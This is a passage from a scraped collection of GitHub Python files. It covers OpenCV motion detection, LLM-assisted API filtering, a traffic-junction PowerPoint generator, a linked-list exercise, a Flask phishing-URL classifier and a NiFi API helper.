Compute the absolute difference between two frames\n diff = cv2.absdiff(first_frame, last_frame)\n\n # Convert the frame to grayscale\n diff_gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n\n # Apply blurness to smoothen the frame\n diff_blur = cv2.GaussianBlur(diff_gray, (5, 5), 0)\n\n # Apply a threshold to highlight the moving pixels\n _, threshold_bin = cv2.threshold(diff_blur, 20, 255, cv2.THRESH_BINARY)\n\n # Find contours in the threshold image\n contours, hierarchy = cv2.findContours(threshold_bin, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw the rectangle box\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n if cv2.contourArea(cnt) > 300:\n cv2.rectangle(first_frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n # Put text on each grounding box\n cv2.putText(first_frame, 'Motion Detected', (x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2, cv2.LINE_AA)\n \n surface_masked = cv2.bitwise_and(first_frame, first_frame, mask=surface_mask)\n # Combine the detected and the mask frame\n all_frame = np.hstack((first_frame, surface_masked))\n\n # Display the output frames and compare them side by side\n cv2.imshow(\"Motion Detector and Mask\", cv2.resize(all_frame, None, fx=0.5, fy=0.5))\n \n #Press 'ESC' key to exit\n if cv2.waitKey(10) == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows() \n","repo_name":"ricky51351/Python_Projects","sub_path":"motion_detector.py","file_name":"motion_detector.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3693553522","text":"import json, os, re\nfrom base_graph_ast import *\n\nfrom configs.model_config import *\nfrom model.model import *\nfrom prompt.prompt import *\n\nclass JSONFilter:\n \"\"\"\n Initializes a JSON filter class with a strategy\n \"\"\"\n def __init__(self, strategy):\n self.strategy = strategy\n\n def set_strategy(self, strategy):\n self.strategy = strategy\n\n def filter_keys(self, json_data):\n return self.strategy.filter_keys(json_data)\n\nclass NonUnderscoreFilterStrategy:\n \"\"\"\n Remove keys that start with an underscore.\n \"\"\"\n def filter_keys(self, json_data):\n filtered_data = {}\n for key, value in json_data.items():\n if not key.startswith('_'):\n filtered_data[key] = value\n return filtered_data\n\nclass IndegreeSortFilterStrategy:\n \"\"\"\n Remove keys with indegrees above a threshold by loading precomputed indegree values from a JSON file.\n \"\"\"\n def __init__(self):\n compute_degree_graph()\n with open(os.path.join(LIB_ANALYSIS_PATH,'sorted_nodes.json'), 'r') as file:\n self.indegree_json = json.load(file)\n print('sorted_nodes.json loaded succesfully!')\n \n def filter_keys(self, json_data, indegree_threshold=10):\n filtered_data = {}\n for key in json_data:\n if key in self.indegree_json and self.indegree_json[key]['in_degree'] <= indegree_threshold:\n filtered_data[key] = json_data[key]\n return filtered_data\n\nclass StrContainFilterStrategy:\n \"\"\"\n Filters keys shown in the content\n \"\"\"\n def filter_keys(self, json_data, content):\n filtered_data = {}\n for key, value in json_data.items():\n if key in content:\n filtered_data[key] = value\n return filtered_data\n\nclass WebAPIFilterStrategy:\n \"\"\"\n Filters keys appeared in web API\n \"\"\"\n def __init__(self, ):\n # load html, groundtruth\n content = process_html(API_HTML_PATH)\n # process APIs\n ori_content_keys = list(set([i for i in content.split(' ') if (LIB_ALIAS in i) and ('.' 
in i) and (not i.split('.')[-1].isupper())]))# \n        self.web_API = {}\n        for item in ori_content_keys:\n            key = item.split(\".\")[-1]\n            if key not in self.web_API:\n                self.web_API[key] = []\n            self.web_API[key].append(item)\n\n    def filter_keys(self, json_data):\n        filtered_data = {}\n        for key, value in json_data.items():\n            if key in self.web_API:\n                filtered_data[key] = value\n        return filtered_data\n\nclass LLMFilterStrategy:\n    \"\"\"\n    Use an LLM to find the full API answer for a given function keyword\n    \"\"\"\n    def __init__(self, ):\n        # Read the JSON data\n        with open(os.path.join(LIB_ANALYSIS_PATH,'API_func.json'), 'r') as f:\n            data = json.load(f)\n        print(len(data),' func detected!')\n\n        strategy = IndegreeSortFilterStrategy() \n        json_filter = JSONFilter(strategy)\n        filtered_data = json_filter.filter_keys(data)\n        print('After step1, ', len(filtered_data),' func detected!')\n\n        # load index html\n        content = process_html(API_HTML_PATH)\n        self.content_list = split_string_with_limit(content, limit=500)\n        print('split html content into ', len(self.content_list), ' contents!')\n        # Step2: check if item is in html\n        strategy = StrContainFilterStrategy() \n        json_filter = JSONFilter(strategy)\n        self.filtered_data = json_filter.filter_keys(filtered_data)\n        print('After step2, ', len(self.filtered_data),' func detected!')\n        \n        # LLM and prompt\n        self.llm, self.tokenizer = LLM_model()\n        self.chat_prompt = Factory_prompt_json(\"askfullAPI\")\n    \n    def filter_keys(self, json_data):\n        \"\"\"\n        Filters keys present in LLM data from the input json data\n        \"\"\"\n        self.run_llm()\n        LLM_data = self.clean_from_llmanswer(self.answer_api_available)\n        # keep only the keys for which the LLM returned a matching full API path\n        filtered_data = {}\n        for key, value in json_data.items():\n            if key in LLM_data:\n                filtered_data[key] = value\n        return filtered_data\n    \n    def run_llm(self,):\n        \"\"\"\n        Runs LLM API for each data and stores the output in a JSON file\n        \"\"\"\n        all_func = list(self.filtered_data.keys())\n        self.answer_api_available = {}\n        for key in all_func:\n            self.answer_api_available[key] = []\n            for content in self.content_list:\n                if key not in content:\n                    continue\n                kwargs = {\"API\":key,\"content\":content}\n                print(f'Can you help to find the full command of keyword {key}?')\n                response, history = LLM_response(self.llm,self.tokenizer,self.chat_prompt,history=[],kwargs=kwargs)\n                print('Agent:',response)\n                self.answer_api_available[key].append(response)\n        with open(os.path.join(LIB_ANALYSIS_PATH,'askLLM_API.json'), 'w') as f:\n            json.dump(self.answer_api_available, f, indent=4)\n    \n    def clean_from_llmanswer(self,json_data):\n        \"\"\"\n        Keep only the LLM answers whose extracted API path ends with the queried key name\n        \"\"\"\n        LLM_data = {}\n        for key, value_list in json_data.items():\n            filtered_list = []\n            for value in value_list:\n                content = value.split('[')[-1].split(']')[0].strip()\n                last_token = content.split('.')[-1]\n                if last_token == key:\n                    filtered_list.append(value)\n            if filtered_list:\n                LLM_data[key] = filtered_list\n        return LLM_data\n\ndef process_html(html_path):\n    \"\"\"\n    Loads HTML file content after removing excessive spaces.\n    \"\"\"\n    # BSHTMLLoader is not imported at module level; assuming the LangChain\n    # document loader is the intended dependency here\n    from langchain.document_loaders import BSHTMLLoader\n    webcontent = BSHTMLLoader(html_path).load()\n    content = ' '.join([i.page_content for i in webcontent])\n    # To remove large blocks of whitespace without removing spaces between words, ensuring the shortest possible input for LLM.\n    content = re.sub(r'\\s+', ' ', content)\n    return content\n\ndef split_string_with_limit(string, limit):\n    \"\"\"\n    Splits a string into chunks of words not exceeding the limit length\n    \"\"\"\n    words = string.split()\n    chunks 
= []\n current_chunk = \"\"\n current_count = 0\n for word in words:\n if current_count + len(word) > limit:\n chunks.append(current_chunk.strip())\n current_chunk = \"\" \n current_count = 0\n current_chunk += word + \" \"\n current_count += len(word) + 1\n if current_chunk:\n chunks.append(current_chunk.strip())\n return chunks\n\n\nif __name__=='__main__':\n # test\n # load json\n with open(os.path.join(LIB_ANALYSIS_PATH,'API_func.json'), 'r') as file:\n data = json.load(file)\n strategy = IndegreeSortFilterStrategy() \n json_filter = JSONFilter(strategy)\n filtered_data = json_filter.filter_keys(data)\n # save json\n with open(os.path.join(LIB_ANALYSIS_PATH,'API_func_filtered.json'), 'w') as file:\n file.write(json.dumps(filtered_data, indent=4))\n","repo_name":"batmen-lab/BioMANIA","sub_path":"src/dataloader/utils/extract_filter_from_function.py","file_name":"extract_filter_from_function.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35883180454","text":"from pptx.dml.color import RGBColor\nfrom pptx.enum.lang import MSO_LANGUAGE_ID\nfrom pptx.enum.text import MSO_AUTO_SIZE\nfrom pptx.util import Pt\n\nfrom Building_Diagram import *\nfrom Directions import *\nfrom General_Info import *\nfrom ID import ID\nfrom LRT_Info import *\n\n\nclass Diagram:\n \"\"\"\n A class used to represent all the info about the junction that is needed for creating the Diagram presentation file.\n \"\"\"\n\n def __init__(self):\n \"\"\" The constructor of the Diagram class,called when a new instance of a class is created.\n To initialize, it needs the output of Phaser and the info from the excel\"\"\"\n self.__North = Direction(\n \"North\") # A property representing the north direction. Initialized with the name \"North\"\n self.__South = Direction(\n \"South\") # A property representing the south direction. Initialized with the name \"South\"\n self.__East = Direction(\"East\") # A property representing the east direction. Initialized with the name \"East\"\n self.__West = Direction(\"West\") # A property representing the west direction. Initialized with the name \"West\"\n self.__GenInfo = General_Info() # A property representing general info about the junction.\n self.__LRTInfo = LRT_Info() # A property representing LRT info about the junction.\n self.__InfoFromPhaser = \"\" # A class that holds the output from Phaser. That is the data the will be pushed to\n # the different class in Diagram and Table.\n self.__IdInfo = ID() # A list with info about the creator of the volume_calculator excel file. 
It is\n # used in the ID file\n self.__OutputFolder = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n\n @property\n def NO(self):\n \"\"\"Get the north info\"\"\"\n return self.__North\n\n @NO.setter\n def NO(self, value):\n \"\"\"Set the north info\"\"\"\n self.__North = value\n\n @property\n def SO(self):\n \"\"\"Get the south info\"\"\"\n return self.__South\n\n @SO.setter\n def SO(self, value):\n \"\"\"Set the south info\"\"\"\n self.__South = value\n\n @property\n def EA(self):\n \"\"\"Get the east info\"\"\"\n return self.__East\n\n @EA.setter\n def EA(self, value):\n \"\"\"Set the east info\"\"\"\n self.__East = value\n\n @property\n def WE(self):\n \"\"\"Get the west info\"\"\"\n return self.__West\n\n @WE.setter\n def WE(self, value):\n \"\"\"Set the north info\"\"\"\n self.__West = value\n\n @property\n def G_INF(self):\n \"\"\"Get the general info\"\"\"\n return self.__GenInfo\n\n @G_INF.setter\n def G_INF(self, value):\n \"\"\"Set the general info\"\"\"\n self.__GenInfo = value\n\n @property\n def LRT_INF(self):\n \"\"\"Get the LRT info\"\"\"\n return self.__LRTInfo\n\n @LRT_INF.setter\n def LRT_INF(self, value):\n \"\"\"Set the LRT info\"\"\"\n self.__LRTInfo = value\n\n @property\n def phsr_lst(self):\n \"\"\"Get the phaser list info\"\"\"\n return self.__InfoFromPhaser\n\n @phsr_lst.setter\n def phsr_lst(self, value):\n \"\"\"Set the phaser list info\"\"\"\n self.__InfoFromPhaser = value\n\n @property\n def ID(self):\n \"\"\"Get the excel properties of the current JUNC\"\"\"\n return self.__IdInfo\n\n @ID.setter\n def ID(self, value):\n \"\"\"Set the excel properties of the current JUNC\"\"\"\n self.__IdInfo = value\n\n @property\n def OUTPUT(self):\n \"\"\"Get the output path of the final JUNC\"\"\"\n return self.__OutputFolder\n\n @OUTPUT.setter\n def OUTPUT(self, destination_path):\n \"\"\"Set the output path of the final JUNC\"\"\"\n self.__OutputFolder = destination_path\n\n def push_arr(self):\n \"\"\"the method uses the output arrows of Phaser to push them into the right subclass of each direction,\n divided to regular arrows and public transport arrows. 
\"\"\"\n arr_list = [self.phsr_lst.ARROW_REG, self.phsr_lst.ARROW_PT]\n orig_lanes = [\"R\", \"TR\", \"T\", \"TL\", \"L\", \"A\", \"RL\"]\n directions = [self.NO.LAN, self.SO.LAN, self.EA.LAN, self.WE.LAN]\n\n for direc in directions:\n for lan in orig_lanes:\n if arr_list[0]:\n cur_arrow_input = [arr_list[0][0], arr_list[1][0]]\n if lan == \"R\":\n SR_cur_arrow_input = [0, 0]\n if arr_list[0][0] == 9:\n SR_cur_arrow_input[0] = 1\n cur_arrow_input[0] = 0\n if arr_list[1][0] == 9:\n SR_cur_arrow_input[1] = 1\n cur_arrow_input[1] = 0\n if sum(SR_cur_arrow_input) > 0:\n setattr(direc, \"SR\", SR_cur_arrow_input)\n setattr(direc, lan, cur_arrow_input)\n arr_list[0].pop(0)\n arr_list[1].pop(0)\n\n def push_vol(self):\n \"\"\"the method uses the output volumes of Phaser to push them into the right subclass of each direction,\n divided to morning and evening\"\"\"\n vol_list = [self.phsr_lst.MOR_VOL, self.phsr_lst.EVE_VOL]\n directions_mor = [self.NO.MOR, self.SO.MOR, self.EA.MOR, self.WE.MOR]\n directions_eve = [self.NO.EVE, self.SO.EVE, self.EA.EVE, self.WE.EVE]\n count = -1\n\n for vol in vol_list:\n count += 1\n if count == 0:\n directions = directions_mor\n else:\n directions = directions_eve\n for direc in directions:\n routes = [\"R\", \"T\", \"L\"]\n for rou in routes:\n if vol:\n value_to_push = int(vol[0])\n setattr(direc, rou, value_to_push)\n vol.pop(0)\n\n def push_general_info(self):\n \"\"\"the method uses the output general information of Phaser to push it into G_INF subclass and to each\n matching property in that subclass. For specific info that related to the LRT, it pushes it to LRT_INF \"\"\"\n phaser_gen_info_list = self.phsr_lst.GEN_INFO\n info_list = [self.G_INF, self.LRT_INF]\n inf_counter = 0\n lrt_types = [0, 0]\n info_types = [\"CAP\", \"NLSL\", \"ELWL\", \"IMG5\", \"IMG6\", \"GEONS\", \"GEOEW\", \"LOOP\", \"LRT_Orig\", \"LRT_Orig\",\n \"INF\"]\n while inf_counter < len(info_types):\n\n if inf_counter == 8 or inf_counter == 9:\n curr_inf = info_list[1]\n lrt_types[inf_counter - 8] = phaser_gen_info_list[inf_counter]\n data_to_push = lrt_types\n else:\n curr_inf = info_list[0]\n data_to_push = phaser_gen_info_list[inf_counter]\n setattr(curr_inf, info_types[inf_counter], data_to_push)\n inf_counter += 1\n self.LRT_INF.lrt_orig_to_dir()\n\n def push_lrt_info(self):\n \"\"\"the method uses the output LRT information of Phaser to push it into LRT_INF subclass and to each\n matching property in that subclass.\"\"\"\n phaser_lrt_info_list = self.phsr_lst.LRT_INFO\n phaser_lrt_info_list.pop(0)\n lrt_info_types = [\"CYC_TIME\", \"LRT_LOST_TIME\", \"LRT_HDWAY\", \"LRT_MCU\", \"GEN_LOST_TIME\"]\n for i, lrt_inf in enumerate(lrt_info_types):\n setattr(self.LRT_INF, lrt_inf, phaser_lrt_info_list[i])\n\n def push_street_names(self):\n \"\"\"the method uses the output street names of Phaser to push it into phsr_lst subclass and to the\n matching property in that subclass (STREET).\"\"\"\n phaser_street_names_list = self.phsr_lst.STREETS\n dir_list = {\"NO\": self.NO, \"SO\": self.SO, \"EA\": self.EA, \"WE\": self.WE}\n dir_keys = list(dir_list.keys())\n for cur_dir in dir_keys:\n the_dir = dir_list[cur_dir]\n the_name = phaser_street_names_list[dir_keys.index(cur_dir)]\n setattr(the_dir, \"NAME\", the_name)\n\n def get_type_of_junc_for_choosing_slide(self):\n \"\"\"This method checks about each direction in the junction whether it's empty or not (empty: no lanes or\n volumes); It creates a string that is later translated into a type of junction +,⊢,⊤,⊣,⊥ The method also\n checks for 
LRT in the junction (and it's direction), and for a metro around the junction. The method returns a\n number that matches the info about the junction and represents a matching slide in the diagrams template\n file. If the junction contains only three directions, the method updates a property that later will be\n used for the oneway function.\n \"\"\"\n north = str(self.NO.empty_direction())\n south = str(self.SO.empty_direction())\n east = str(self.EA.empty_direction())\n west = str(self.WE.empty_direction())\n dir_exist = north + south + east + west\n types = {'1111': 1, '1110': 2, '0111': 3, '1101': 4, '1011': 5}\n if self.LRT_INF.LRT_Dir > 0:\n lrt_type = 1\n else:\n lrt_type = 0\n if self.LRT_INF.Metro_Dir > 0:\n metro_type = 2\n else:\n metro_type = 0\n junc_type = metro_type * 5 + lrt_type * 5 + types[dir_exist]\n if types[dir_exist] > 1:\n self.G_INF.ONEWAY = types[dir_exist]\n return junc_type\n\n def add_street_name_and_lrt(self, pres):\n \"\"\"The method goes through all the shapes in Diagram pptx file and checks if it represents a direction\n name; It adds the matching name to each street, based on the name property of each direction. If the junction\n has lrt, the method adds the direction of the lrt. If the junction has only 3 direction, the method calls\n 'is_oneway' method, to check if it's a oneway street\n \"\"\"\n\n street_placeholders = {\"NORTH_NAME\": self.NO.NAME, \"SOUTH_NAME\": self.SO.NAME, \"EAST_NAME\": self.EA.NAME,\n \"WEST_NAME\": self.WE.NAME, \"RAKAL\": self.LRT_INF.LRT_Dir}\n lrt_type_to_string = {0: \"\", 1: \"צפון ⇋ דרום\", 2: \"מזרח ⇋ מערב\", 3: \"צפ ⇋ דר, מז ⇋ מע\"}\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in street_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n text_frame.word_wrap = True\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n if shape.name == \"RAKAL\":\n text_frame = shape.text_frame\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = False\n font.size = Pt(18)\n font.color.rgb = RGBColor(228, 223, 211)\n font.language_id = MSO_LANGUAGE_ID.HEBREW\n text_frame.text_wrap = True\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n text_frame.text_wrap = True\n font.name = 'Assistant'\n run.text = str(lrt_type_to_string[street_placeholders[shape.name]])\n else:\n text_frame = shape.text_frame\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = True\n font.size = Pt(24)\n font.language_id = MSO_LANGUAGE_ID.HEBREW\n font.color.rgb = RGBColor(89, 89, 89)\n font.name = 'Assistant'\n if street_placeholders[shape.name] == 0:\n run.text = \"\"\n else:\n run.text = str(street_placeholders[shape.name])\n text_frame.text_wrap = True\n text_frame.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE\n if self.G_INF.ONEWAY > 1:\n self.is_oneway(pres)\n pres.save(\"Street_Diagram.pptx\")\n\n def add_morning_volumes(self, pres):\n \"\"\"\n The method goes through all the shapes in Diagram pptx file and checks if it represents a volume of the\n morning counts; It adds the matching volume to each direction, based on the route property of each direction(\n L,T,R).\n \"\"\"\n\n volume_placeholders = {\"NORTH_MOR_R\": self.NO.MOR.R, \"NORTH_MOR_T\": self.NO.MOR.T, \"NORTH_MOR_L\": self.NO.MOR.L,\n \"SOUTH_MOR_R\": self.SO.MOR.R, \"SOUTH_MOR_T\": self.SO.MOR.T, \"SOUTH_MOR_L\": self.SO.MOR.L,\n \"EAST_MOR_R\": self.EA.MOR.R, 
\"EAST_MOR_T\": self.EA.MOR.T, \"EAST_MOR_L\": self.EA.MOR.L,\n \"WEST_MOR_R\": self.WE.MOR.R, \"WEST_MOR_T\": self.WE.MOR.T, \"WEST_MOR_L\": self.WE.MOR.L\n }\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in volume_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.language_id = MSO_LANGUAGE_ID.HEBREW\n font.bold = True\n font.italic = None\n font.size = Pt(16)\n font.color.rgb = RGBColor(255, 192, 0)\n font.name = \"Assistant\"\n if volume_placeholders[shape.name] == 0:\n data_to_push = \"-\"\n else:\n data_to_push = str(volume_placeholders[shape.name])\n run.text = data_to_push\n pres.save(\"Morn_Diagram.pptx\")\n\n def add_evening_volumes(self, pres):\n \"\"\"\n The method goes through all the shapes in Diagram pptx file and checks if it represents a volume of the\n evening counts; It adds the matching volume to each direction, based on the route property of each direction(\n L,T,R).\n \"\"\"\n volume_placeholders = {\"NORTH_EVE_R\": self.NO.EVE.R, \"NORTH_EVE_T\": self.NO.EVE.T, \"NORTH_EVE_L\": self.NO.EVE.L,\n \"SOUTH_EVE_R\": self.SO.EVE.R, \"SOUTH_EVE_T\": self.SO.EVE.T, \"SOUTH_EVE_L\": self.SO.EVE.L,\n \"EAST_EVE_R\": self.EA.EVE.R, \"EAST_EVE_T\": self.EA.EVE.T, \"EAST_EVE_L\": self.EA.EVE.L,\n \"WEST_EVE_R\": self.WE.EVE.R, \"WEST_EVE_T\": self.WE.EVE.T, \"WEST_EVE_L\": self.WE.EVE.L}\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in volume_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = True\n font.italic = None\n font.size = Pt(16)\n font.color.rgb = RGBColor(200, 214, 223)\n font.name = \"Assistant\"\n if volume_placeholders[shape.name] == 0:\n data_to_push = \"-\"\n else:\n data_to_push = str(volume_placeholders[shape.name])\n run.text = data_to_push\n pres.save(\"Eve_Diagram.pptx\")\n\n def add_direction_arrows(self, pres):\n \"\"\"\n The method goes through all the shapes in Diagram pptx file and checks if it represents a string of arrows;\n It adds the matching arrow string after organizing them in the right logical order,\n using Organize_arrows_order method.\n \"\"\"\n match_colors_to_type = {\"White\": RGBColor(255, 255, 255), \"Yellow\": RGBColor(250, 201, 49)}\n arrows_placeholders = {\"NORTH_ARROWS\": self.NO.LAN.Organize_arrows_order(),\n \"SOUTH_ARROWS\": self.SO.LAN.Organize_arrows_order(),\n \"EAST_ARROWS\": self.EA.LAN.Organize_arrows_order(),\n \"WEST_ARROWS\": self.WE.LAN.Organize_arrows_order()}\n for slide in pres.slides:\n for shape in slide.shapes:\n if shape.name in arrows_placeholders.keys():\n text_frame = shape.text_frame\n text_frame.clear()\n arrows_list = arrows_placeholders[shape.name]\n for arrow in arrows_list:\n text_frame = shape.text_frame\n p = text_frame.paragraphs[0]\n run = p.add_run()\n font = run.font\n font.bold = False\n font.size = Pt(50)\n font.color.rgb = match_colors_to_type[arrow[2]]\n font.name = 'Traffic Arrows 2 Medium normal'\n run.text = arrow[0] * arrow[1]\n pres.save(\"Dirc_Diagram.pptx\")\n\n def is_oneway(self, pres):\n \"\"\"the method is being called when the junction has three directions; It checks if the fourth direction is a\n oneway direction. If it is, it adds a matching oneway road to the final diagram. 
\"\"\"\n opt_oneway = self.G_INF.ONEWAY\n src = os.getcwd() + r\"\\Oneway_template\\\\\"\n type_dict = {2: \"NoWest\", 3: \"NoNorth\", 4: \"NoEast\", 5: \"NoSouth\"}\n OneWay = \"\"\n if type_dict[opt_oneway] == \"NoNorth\":\n if (self.EA.MOR.R > 0) or (self.EA.EVE.R > 0) \\\n or (self.WE.MOR.L > 0) or (self.WE.EVE.L > 0) \\\n or (self.SO.MOR.T > 0) or (self.SO.EVE.T > 0):\n OneWay = \"North\"\n\n if type_dict[opt_oneway] == \"NoSouth\":\n if (self.WE.MOR.R > 0) or (self.WE.EVE.R > 0) \\\n or (self.EA.MOR.L > 0) or (self.EA.EVE.L > 0) \\\n or (self.NO.MOR.T > 0) or (self.NO.EVE.T > 0):\n OneWay = \"South\"\n\n if type_dict[opt_oneway] == \"NoEast\":\n if (self.SO.MOR.R > 0) or (self.SO.EVE.R > 0) \\\n or (self.NO.MOR.L > 0) or (self.NO.EVE.L > 0) \\\n or (self.WE.MOR.T > 0) or (self.WE.EVE.T > 0):\n OneWay = \"East\"\n\n if type_dict[opt_oneway] == \"NoWest\":\n if (self.NO.MOR.R > 0) or (self.NO.EVE.R > 0) \\\n or (self.SO.MOR.L > 0) or (self.SO.EVE.L > 0) \\\n or (self.EA.MOR.T > 0) or (self.EA.EVE.T > 0):\n OneWay = \"West\"\n if OneWay != \"\":\n for slide in pres.slides:\n oneway_prop = {\"North\": [2915380, 0], # North: [(slide.width - pic.width)/2, 0]\n \"South\": [2915380, 4635945],\n # South: [(slide.width - pic.width)/2, (slide.height - pic.height)]\n \"East\": [4635945, 2915380],\n # East: [(slide.width - pic.width), (slide.width - pic.width)/2]\n \"West\": [0, 2915380]} # West: [0, (slide.width - pic.width)/2]\n\n img_path = src + OneWay + \"_one_way.png\"\n slide.shapes.add_picture(img_path, oneway_prop[OneWay][0], oneway_prop[OneWay][1])\n","repo_name":"dartaryan/JUNC","sub_path":"Diagram.py","file_name":"Diagram.py","file_ext":"py","file_size_in_byte":19588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30944765296","text":"class Node:\n def __init__(self, val=None):\n self.val = val\n self.next, self.prev = None\n\n\nclass MyLinkedList:\n\n def __init__(self):\n self.head = Node()\n\n def get(self, index: int) -> int:\n current = self.head\n ptr = 0\n while ptr < index:\n current = current.next\n ptr += 1\n if current is None:\n return -1\n if current.next is None:\n return -1\n return current.next.val\n\n def addAtHead(self, val: int) -> None:\n values = Node(val)\n values.next = self.head.next\n self.head.next = values\n return self.head.next.val\n\n def addAtTail(self, val: int) -> None:\n if self.head.next == None:\n self.head.next = Node(val)\n return\n current = self.head\n while current.next is not None:\n current = current.next\n current.next = Node(val)\n\n def addAtIndex(self, index: int, val: int) -> None:\n current = self.head\n for ptr in range(index):\n current = current.next\n inserted_value = Node(val)\n if current is None:\n current = inserted_value\n inserted_value.next = current.next\n current.next = inserted_value\n\n def deleteAtIndex(self, index: int) -> None:\n current = self.head\n for ptr in range(index):\n current = current.next\n if current is None:\n return\n \n if current.next is None:\n return\n elif current.next.next is None:\n current.next = None\n else:\n current.next = current.next.next\n","repo_name":"primequantuM4/competitive_programming","sub_path":"DesignLinkedList.py","file_name":"DesignLinkedList.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25586220733","text":"from extract_features import get_features\r\nfrom flask import Flask, render_template, 
request\r\nimport pickle\r\nimport numpy as np\r\n\r\napp = Flask(__name__)\r\n\r\ndef convertEncodingToPositive(data):\r\n    mapping = {-1: 2, 0: 0, 1: 1}\r\n    i = 0\r\n    for col in data:\r\n        data[i] = mapping[col]\r\n        i+=1\r\n    return data\r\n\r\ndef make_prediction(url):\r\n\r\n    features = get_features(url)\r\n    #print(features)\r\n    features_extracted = convertEncodingToPositive(features)\r\n    #print(features_extracted)\r\n\r\n    from sklearn.preprocessing import OneHotEncoder\r\n    encoder = OneHotEncoder(sparse=False)\r\n\r\n    one_hot_enc = pickle.load(open(\"One_Hot_Encoder\", \"rb\"))\r\n    transformed_point = one_hot_enc.transform(np.array(features_extracted).reshape(1, -1))\r\n\r\n    model = pickle.load(open(\"RF_Final_Model.pkl\", \"rb\"))\r\n    prediction = model.predict(transformed_point)[0]\r\n\r\n    return prediction\r\n\r\n\r\n\r\n\r\n@app.route('/')\r\ndef first():\r\n    return render_template('home.html')\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef home():\r\n    \r\n    url = request.form['url']\r\n    \r\n    output = make_prediction(url)\r\n\r\n    return render_template('home.html', prediction_text=output)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\" :\r\n\r\n    #Updates app dynamically\r\n    app.run(debug=True)\r\n\r\n\r\n\r\n\r\n# url = \"https://www.github.com/karans-15\"\r\n\r\n# def make_prediction(url):\r\n\r\n#     features = get_features(url)\r\n#     #print(features)\r\n#     features_extracted = convertEncodingToPositive(features)\r\n#     #print(features_extracted)\r\n\r\n#     from sklearn.preprocessing import OneHotEncoder\r\n#     encoder = OneHotEncoder(sparse=False)\r\n\r\n#     one_hot_enc = pickle.load(open(\"One_Hot_Encoder\", \"rb\"))\r\n#     transformed_point = one_hot_enc.transform(np.array(features_extracted).reshape(1, -1))\r\n\r\n#     model = pickle.load(open(\"RF_Final_Model.pkl\", \"rb\"))\r\n#     prediction = model.predict(transformed_point)[0]\r\n\r\n#     if(prediction==1):\r\n#         print(\"Website is SAFE!\")\r\n#     elif(prediction==2):\r\n#         print(\"DANGER!! This appears to be a phishing website\")\r\n#     else:\r\n#         print(\"Proceed with CAUTION, this seems Suspicious\")\r\n\r\n# make_prediction(url)","repo_name":"karans-15/malicious-url-detector","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74367406170","text":"__version__ = \"1.0.0\"\n\n\nclass MovieMaker(object):\n    \"\"\"\n    MovieMaker class\n    Save frames into files in order to make a movie\n    \"\"\"\n\n    allowed_type = {'tif', 'gif', 'png'}\n\n    def __init__(self, ptw, name, movie_type):\n        \"\"\"\n        Class constructor\n        :param ptw:\n        :param name:\n        :param movie_type:\n        :return:\n        \"\"\"\n        self.ptw = ptw\n        self.name = name\n        self.frame = 0\n        if movie_type in self.allowed_type:\n            self.type = movie_type\n        else:\n            raise TypeError(\"{} is not a supported type. 
You should use {} instead\".format(movie_type, self.allowed_type))\n        self.prepare()\n\n    def prepare(self):\n        \"\"\"\n        Create destination folder\n        :return:\n        \"\"\"\n        import os\n        if not os.path.isdir(self.name):\n            os.mkdir(self.name)\n\n    def run(self):\n        \"\"\"\n        Captures a frame into a numbered file\n        :return:\n        \"\"\"\n        # Make Movie\n        self.frame += 1\n        filename = \"{}/{}_{}.{}\".format(self.name, self.name, self.frame, self.type)\n        self.ptw.getMovieFrame()\n        #self.ptw.saveMovieFrames(filename)\n\n    def close(self):\n        \"\"\"\n        Saves the captured frame into a file\n        :return:\n        \"\"\"\n        filename = \"{}/{}_{}.{}\".format(self.name, self.name, self.frame, self.type)\n        self.ptw.saveMovieFrames(filename)","repo_name":"Fperdreau/EasyExp","sub_path":"core/movie/moviemaker.py","file_name":"moviemaker.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4964479168","text":"import requests\nimport json\nfrom time import time\n\n\ndef pause(secs):\n    init_time = time()\n    while time() < init_time + secs:\n        pass\n\ndef get_token(url_nifi_api: str, access_payload: dict):\n    \"\"\"\n    Retrieves a JWT token by authenticating the user, makes\n    use of the REST API `/access/token`.\n    :param url_nifi_api: the basic URL to the NiFi API.\n    :param access_payload: dictionary with keys 'username' & 